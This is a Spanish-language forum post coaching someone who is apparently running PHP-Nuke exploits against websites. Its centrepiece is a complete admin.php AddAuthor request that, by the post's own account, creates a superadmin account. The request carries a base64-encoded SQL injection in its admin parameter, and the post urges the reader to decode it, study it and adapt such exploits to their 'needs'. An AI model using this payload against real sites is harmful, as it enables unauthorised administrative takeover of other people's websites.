Bueno, antes que nada hay que entender en que consisten las exploits que estamos utilizando y que hacen exactamente. (Un poco de conocimiento de SQL viene bien) Si buscas en este foro y usas un poco el google, en 2 dias ya estaras modificando las exploits para que se adecuen a tus "necesidades" o al menos comprendiendo cada instruccion que ejecutan...
Tb te recomiendo para el tema del php nuke que te des una vuelta por
www.waraxe.us (esta en ingles)
Si no te han funcionado las exploits o estan parcheados los sites, o las estas poniendo al "tuntun"
"admin.php?op=AddAuthor&add_aid=un4m3&add_name=God&add_pwd=123456&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox "
Si te fijas cada campo tiene su significado. Este exploit en concreto sirve para crearte una cuenta superadmin en la pagina en cuestion. Curiosea un poco sobre que significan los campos add_aid, add_name, add_pwd, add_email, add_radminsuper (es un poco obvio
) y molestate en pasarle un decode64 a eCcgVU5JT04gU0VMRUNUIDEvKjox (el value de admin) y busca informacion sobre la consulta SQL que te sale y pq esta estructurada de esa manera... Si empiezas por ahi, probablemente empiezes a ver mas claras las exploits de este tipo